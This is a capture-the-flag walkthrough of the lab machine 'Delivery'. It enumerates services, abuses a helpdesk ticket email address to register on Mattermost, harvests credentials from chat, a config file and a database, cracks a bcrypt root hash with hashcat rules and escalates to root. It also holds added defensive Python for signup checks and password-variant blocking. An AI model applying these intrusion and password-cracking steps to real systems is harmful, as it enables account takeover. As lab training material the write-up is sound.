Delivery

$ echo "10.10.10.222 delivery.htb" | sudo tee -a /etc/hosts
$ echo "10.10.10.222 helpdesk.delivery.htb" | sudo tee -a /etc/hosts

$ sudo nmap -p- -T4 -A 10.10.10.222
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Tue, 13 Apr 2021 04:55:33 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: m8cge3fo5bfr7gr9wwksgbrufe
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Tue, 13 Apr 2021 13:18:21 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Tue, 13 Apr 2021 13:18:22 GMT
|_    Content-Length: 0

Mattermost: http://delivery.htb:8065/login; 
Support Center: http://helpdesk.delivery.htb/index.php;
osTicket: http://helpdesk.delivery.htb/scp/login.php
$ nikto -h http://helpdesk.delivery.htb/
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ 7865 requests: 0 error(s) and 4 item(s) reported on remote host
$  dirb http://helpdesk.delivery.htb/
---- Scanning URL: http://helpdesk.delivery.htb/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/api/                                                                           
==> DIRECTORY: http://helpdesk.delivery.htb/apps/                                                                          
==> DIRECTORY: http://helpdesk.delivery.htb/assets/                                                                        
==> DIRECTORY: http://helpdesk.delivery.htb/css/                                                                           
==> DIRECTORY: http://helpdesk.delivery.htb/images/                                                                        
+ http://helpdesk.delivery.htb/index.php (CODE:200|SIZE:5010)                                                              
==> DIRECTORY: http://helpdesk.delivery.htb/js/                                                                            
==> DIRECTORY: http://helpdesk.delivery.htb/kb/                                                                            
==> DIRECTORY: http://helpdesk.delivery.htb/pages/                                                                         
+ http://helpdesk.delivery.htb/web.config (CODE:200|SIZE:2197)                                                             
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/api/ ----
+ http://helpdesk.delivery.htb/api/.htaccess (CODE:200|SIZE:204)                                                           
+ http://helpdesk.delivery.htb/api/index.php (CODE:302|SIZE:0)                                                             
+ http://helpdesk.delivery.htb/api/tasks (CODE:400|SIZE:17)                                                                
+ http://helpdesk.delivery.htb/api/tickets (CODE:400|SIZE:17)                                                              
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/apps/ ----
+ http://helpdesk.delivery.htb/apps/.htaccess (CODE:200|SIZE:211)                                                          
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/assets/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/assets/default/                                                                
==> DIRECTORY: http://helpdesk.delivery.htb/assets/font/                                                                   
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/css/ ----
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/images/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/images/captcha/                                                                
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/js/ ----
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/kb/ ----
+ http://helpdesk.delivery.htb/kb/index.php (CODE:302|SIZE:0)                                                              
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/pages/ ----
+ http://helpdesk.delivery.htb/pages/.htaccess (CODE:200|SIZE:207)                                                         
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/assets/default/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/assets/default/css/                                                            
==> DIRECTORY: http://helpdesk.delivery.htb/assets/default/images/                                                         
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/assets/font/ ----
+ http://helpdesk.delivery.htb/assets/font/index.html (CODE:200|SIZE:882)                                                  
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/images/captcha/ ----
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/assets/default/css/ ----
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/assets/default/images/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/assets/default/images/icons/                                                   
                                                                                                                           
---- Entering directory: http://helpdesk.delivery.htb/assets/default/images/icons/ ----

$ dirb http://delivery.htb:8065/
---- Scanning URL: http://delivery.htb:8065/ ----
+ http://delivery.htb:8065/robots.txt (CODE:200|SIZE:26) 
$ nikto -h http://delivery.htb:8065
+ Server: No banner retrieved
+ IP address found in the 'x-version-id' header. The IP is "5.30.0.5".
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-request-id' found, with contents: einj8gd6kbfz7gaz8wmkznuzbc
+ Uncommon header 'x-version-id' found, with contents: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /deliveryhtb.cer: Potentially interesting archive/cert file found.
+ /deliveryhtb.cer: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
... ... 
+ /backup.war: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /site.egg: Potentially interesting archive/cert file found.
+ /site.egg: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /deliveryhtb.tar.lzma: Potentially interesting archive/cert file found.
+ /deliveryhtb.tar.lzma: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /WEB-INF/web.xml: JRUN default file found.
+ 7804 requests: 0 error(s) and 166 item(s) reported on remote host

Register user cpt on http://delivery.htb:8065, then open a ticket on http://helpdesk.delivery.htb/, which gets ticket number 4630330. Then register 4630330@delivery.htb on http://delivery.htb:8065; afterwards the ticket on http://helpdesk.delivery.htb/ shows:
---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=dhgxuqz6gipn675yxu67azggw1wfxe5orxftxsusjeexsit1e3wtd44fs66x9fiw&email=4630330%40delivery.htb 

Open http://delivery.htb:8065/do_verify_email?token=dhgxuqz6gipn675yxu67azggw1wfxe5orxftxsusjeexsit1e3wtd44fs66x9fiw&email=4630330%40delivery.htb
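The trust gap the steps above rely on, as an added example (not from the original notes, Mattermost or osTicket): a sign-up check that trusts any address under the company domain also accepts the helpdesk's per-ticket mailbox, whereas a hardened check parses the address, requires an exact domain match, refuses ticket-style mailboxes and requires the address to exist in a directory. The domain, the 7-digit ticket pattern and the employee directory are constructed assumptions.

```python
import re
from typing import Optional, Tuple

# Constructed assumptions: the domain the chat server trusts for open sign-up,
# and the shape of the mailbox the helpdesk creates per ticket (a 7-digit
# ticket number, as with 4630330@delivery.htb above).
TRUSTED_DOMAIN = "delivery.htb"
TICKET_MAILBOX = re.compile(r"^\d{7}$")

# Constructed employee directory; a real deployment would query its IdP or LDAP.
EMPLOYEE_DIRECTORY = {"maildeliverer@delivery.htb", "root@delivery.htb"}


def split_address(email: str) -> Optional[Tuple[str, str]]:
    """Return (local_part, domain), lowercased, or None if not a single-@ address."""
    if email.count("@") != 1:
        return None
    local, domain = email.strip().lower().split("@")
    if not local or not domain:
        return None
    return local, domain


def signup_allowed_naive(email: str) -> bool:
    """Domain-suffix trust: anything ending in the company domain may register.
    This is the assumption the ticket mailbox trick defeats."""
    return email.lower().endswith(TRUSTED_DOMAIN)


def signup_allowed_hardened(email: str) -> bool:
    """Exact domain match, no helpdesk ticket mailboxes, and the address must be
    a known employee account rather than merely 'something at our domain'."""
    parts = split_address(email)
    if parts is None:
        return False
    local, domain = parts
    if domain != TRUSTED_DOMAIN:
        return False          # also rejects look-alikes such as evil-delivery.htb
    if TICKET_MAILBOX.match(local):
        return False          # the helpdesk hands these out to anyone who opens a ticket
    return f"{local}@{domain}" in EMPLOYEE_DIRECTORY
```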

http://delivery.htb:8065/internal/channels/town-square

root
9:29 AM

@developers Please update theme to the OSTicket before we go live.  Credentials to the server are maildeliverer:Youve_G0t_Mail! 

Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
root
10:58 AM

PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.
kali@kali:~/0.htb/machines/Delivery$ ssh maildeliverer@10.10.10.222
maildeliverer@10.10.10.222's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 13 10:26:36 2021 from 10.10.14.32

maildeliverer:x:1000:1000:MailDeliverer,,,:/home/maildeliverer:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:110:118:MySQL Server,,,:/nonexistent:/bin/false
mattermost:x:998:998::/home/mattermost:/bin/sh
maildeliverer@Delivery:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
maildeliverer@Delivery:~$ sudo cat /etc/shadow
[sudo] password for maildeliverer: 
maildeliverer is not in the sudoers file.  This incident will be reported.



maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt
7c2646fea95d7e13c1827941d4a4a208
maildeliverer@Delivery:~$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .config  .gnupg  .mysql_history  .profile  user.txt  .viminfo
maildeliverer@Delivery:~$ 
maildeliverer@Delivery:~$ cat .viminfo 
# This viminfo file was generated by Vim 8.1.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Last Search Pattern:
~MSle0~/Crack

# Command Line History (newest to oldest):
:q
|2,0,1618302907,,"q"

# Search String History (newest to oldest):
?/Crack
|2,1,1618302852,47,"Crack"
?/crack
|2,1,1618302850,47,"crack"

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
'0  344  30  /opt/mattermost/config/config.json
|4,48,344,30,1618302907,"/opt/mattermost/config/config.json"

# Jumplist (newest first):
-'  344  30  /opt/mattermost/config/config.json
|4,39,344,30,1618302907,"/opt/mattermost/config/config.json"
-'  1  0  /opt/mattermost/config/config.json
|4,39,1,0,1618302852,"/opt/mattermost/config/config.json"

# History of marks within files (newest to oldest):

> /opt/mattermost/config/config.json
        *       1618302906      0
        "       344     30
maildeliverer@Delivery:~$ 

maildeliverer@Delivery:~$ cat .mysql_history 
select Password from User where username='root';
use Users
database
;
help
show databases
;
use mattermost;
select Password from User where username='root';
select Password from Users where username='root';
select * from Users where username='root';
select * from Users ;
show databases
;
use information_schema 
select * from *;
db.show;
information_schema.show;
show tables;
use mattermost 
show tables;
select * from ChannelMemberHistory;
select * from Teams;
select * from Tokens;
select * from GroupMembers;
select * from Commands;
select * from Bots;
select * from Roles;
select * from Reactions;
show database
s
;
show database s;
show database;
show databases;
use mattermost;
show tabels;
show tabel;
show tables;
select * from Users;
show tables;
desc Users;
select Username, Password from Users;
show databases;
use mattermost;
show tables;
desc Users;
select Username, Password from Users;
maildeliverer@Delivery:~$ 

maildeliverer@Delivery:~$ ls /opt/mattermost/
bin  client  config  data  ENTERPRISE-EDITION-LICENSE.txt  fonts  i18n  logs  manifest.txt  NOTICE.txt  plugins  prepackaged_plugins  README.md  templates
maildeliverer@Delivery:/opt/mattermost/config$ cat config.json 

"SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",

maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 6303
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> show tables;

MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| flagaflag1                       | $2a$10$sOaOc/Kc4ywlWJNf5jZEx.TJD.VUA69DLL9CIEIf.naS0yOTmMuUi |
| test                             | $2a$10$7vr8mHkCDxmssBXRU90oiep.9s08cTyXLz.mAKkvKPEkNksGUcA8W |
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| asda                             | $2a$10$AEOIwPtTFdxB9fFi408azOj6Cs.y1BufO6j9TjMwvaXHfQJvpQbae |
| user2                            | $2a$10$cKBYkFLrIbsBcAyOY/pGjeNqdoRT/RVaLq5PbCMYwgmEzcdwBw9rm |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| pppp                             | $2a$10$122P8J1ya9OwddUVPNTrgOdFVoOv49IQ9mxcPw5uJNoxQ6ZAZKsSO |
| postbar                          | $2a$10$zvICVw5//pf3lCk8T2Nt9uGe1pIPuXC7crg06XRBIiDpahEHhlQn6 |
| flag                             | $2a$10$UtzJFbw2JlqznhpHPiUZhOQ8duaQpNpgg9a/92bfPeAJyZ3XLf9ba |
| flagflags                        | $2a$10$RqxWtvzB9.t0CcXh7RhfEuv9WGNIibOcpjoK.lZv45QBU2.SbV99e |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| asd                              | $2a$10$eNe1lZJ3nxmMXC4hclt1VOirSJJ5Pxnx2pSYKwRvnPa4SKPYwMDNq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
| cpt                              | $2a$10$WXLL4yQ62awrHDW.gzwg2OweeKCa4pDJ2YwN9N9lrMYGka/42xTbC |
| flagflag                         | $2a$10$sWXIaGOtDxIG68zsqmS4vu3I7uD0.aH3L5gUsuP7ueoC9.PmljiwK |
| ppp                              | $2a$10$156csW8j1RHJ7GeMvOkn4uSIPNg2a2nMpTuD8gm16Vw1VJy96d222 |
| aakk                             | $2a$10$zwY.fNotl7ycfmtWNP7NLOdS5GZNhvM7F2j2n5NXgKVt2pBlU.jUi |
+----------------------------------+--------------------------------------------------------------+
20 rows in set (0.000 sec)

https://github.com/praetorian-inc/Hob0Rules
https://github.com/hashcat/hashcat/blob/master/rules/best64.rule

hashid
kali@kali:~/0.htb/machines/Delivery$ hashid root.hash 
--File 'root.hash'--
Analyzing '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt 
--End of file 'root.hash'--

kali@kali:~/0.htb/machines/Delivery$ hashid
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
Analyzing '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt 

kali@kali:~/0.htb/machines/Delivery$ hashcat --help|grep bcrypt
   3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating System
kali@kali:~/0.htb/machines/Delivery$ 

kali@kali:~/0.htb/machines/Delivery$ hashcat -a 0 -m 3200 ./root.hash ./wordlist.txt -r ./best64.rule
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E3-1575M v5 @ 3.00GHz, 13889/13953 MB (4096 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache built:
* Filename..: ./wordlist.txt
* Passwords.: 1
* Bytes.....: 17
* Keyspace..: 77
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Tue Apr 13 13:06:20 2021 (2 secs)
Time.Estimated...: Tue Apr 13 13:06:22 2021 (0 secs)
Guess.Base.......: File (./wordlist.txt)
Guess.Mod........: Rules (./best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       11 H/s (1.79ms) @ Accel:4 Loops:32 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:992-1024
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21

Started: Tue Apr 13 13:05:32 2021
Stopped: Tue Apr 13 13:06:24 2021
kali@kali:~/0.htb/machines/Delivery$ 
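The "program to help us stop re-using the same passwords" that root asked for, as an added example (not part of the original notes, and not hashcat's own code): a small interpreter for hashcat's rule syntax that expands a banned phrase the same way the rule attack above does, so a proposed password can be refused when it is a variant of "PleaseSubscribe!". The rule list is constructed for the example and the interpreter covers only a subset of hashcat's rule functions.

```python
from typing import List, Optional, Set

# Constructed rule list in hashcat's rule syntax: case, reverse and number-append
# functions of the kind best64.rule (used above) contains. "$2 $1" is the pair
# of appends that turns "PleaseSubscribe!" into the recovered "PleaseSubscribe!21".
RULES = [":", "r", "u", "c", "T0", "$1", "$2", "$3", "$1 $2", "$2 $1",
         "$1 $2 $3", "^1", "] $a", "sa@", "se3", "ss$", "d", "f"]

# Rule functions that take no argument.
_SIMPLE = {
    ":": lambda w: w,                                # no-op
    "l": str.lower, "u": str.upper, "t": str.swapcase,
    "c": lambda w: w[:1].upper() + w[1:].lower(),    # capitalize
    "r": lambda w: w[::-1],                          # reverse
    "d": lambda w: w + w,                            # duplicate
    "f": lambda w: w + w[::-1],                      # reflect
    "[": lambda w: w[1:],                            # delete first char
    "]": lambda w: w[:-1],                           # delete last char
}


def apply_rule(rule: str, word: str) -> str:
    """Apply one hashcat rule line (functions separated by spaces) to a word.
    Subset only; a position past the end of the word leaves it unchanged."""
    w, i = word, 0
    while i < len(rule):
        f = rule[i]
        i += 1
        if f == " ":
            continue
        if f in _SIMPLE:
            w = _SIMPLE[f](w)
        elif f == "$":                               # append char
            w, i = w + rule[i], i + 1
        elif f == "^":                               # prepend char
            w, i = rule[i] + w, i + 1
        elif f == "@":                               # purge every X
            w, i = w.replace(rule[i], ""), i + 1
        elif f == "s":                               # substitute X with Y
            w, i = w.replace(rule[i], rule[i + 1]), i + 2
        elif f in "TD":                              # toggle case at N / delete at N
            n, i = int(rule[i], 36), i + 1           # positions are 0-9 then A-Z
            if n < len(w):
                w = w[:n] + (w[n].swapcase() if f == "T" else "") + w[n + 1:]
        else:
            raise ValueError(f"unsupported rule function {f!r}")
    return w


def variants(word: str, rules: List[str] = RULES) -> Set[str]:
    """Every candidate a rule-based attack derives from one base word."""
    return {apply_rule(r, word) for r in rules}


def is_banned_variant(candidate: str, banned: List[str],
                      rules: List[str] = RULES) -> Optional[str]:
    """Return the banned base phrase the candidate derives from, else None."""
    for base in banned:
        if candidate in variants(base, rules):
            return base
    return None
```

With a real rule file, read its lines (skipping blanks and `#` comments) into `rules` and the same check covers everything that file would generate from each banned phrase.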

maildeliverer@Delivery:~$ su - root
Password: 
root@Delivery:~# ls
mail.sh  note.txt  py-smtp.py  root.txt
root@Delivery:~# 

root@Delivery:~# cat note.txt 
I hope you enjoyed this box, the attack may seem silly but it demonstrates a pretty high risk vulnerability I've seen several times.  The inspiration for the box is here: 

- https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c 

Keep on hacking! And please don't forget to subscribe to all the security streamers out there.

- ippsec
root@Delivery:~#
root@Delivery:~# cat root.txt 
d61c7f66a214ffed57280bd2635edae7

root@Delivery:~# cat mail.sh 
#!/bin/bash

if ! pgrep -f py-smtp.py &> /dev/null 2>&1; then
  nohup python3 /root/py-smtp.py &
  
fi
root@Delivery:~# 
